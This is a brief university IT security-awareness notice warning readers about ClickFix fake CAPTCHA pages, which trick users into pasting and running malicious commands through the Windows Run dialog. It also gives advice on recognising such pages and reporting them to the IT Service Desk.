The risk of fake CAPTCHAs
We’ve all seen CAPTCHA prompts before, the ones asking you to click on images with traffic lights or type some squiggly letters to prove you’re human. But a sneaky scam is making the rounds again, these are fake CAPTCHA pages that trick you into running malicious code on your device. It’s part of a social engineering tactic known as ClickFix.
How does it work?
You might visit a website (often from a phishing email or pop-up) and see what looks like a normal CAPTCHA, but after clicking the checkbox, it requests a few extra steps, for example:
-
Pressing Windows + R.
-
Pasting in some text using Ctrl + V.
-
Pressing Enter.
The trick is that these steps don’t prove you’re human. Instead, they run malicious code that can infect your device, steal passwords, and give attackers access to your data. This tactic is surprisingly effective, as it mimics real requests you’re used to seeing.
What you can do:
-
Never run or paste commands from unfamiliar sources.
-
If you see a suspicious alert, close the window or browser tab immediately.
-
Be cautious of CAPTCHA prompts on unfamiliar or unexpected websites.
-
If something seems suspicious, don’t continue and report it to the IT Service Desk immediately.
ClickFix relies on tricking users into taking action. By staying cautious and reporting anything unusual, you help protect both yourself and the wider University community.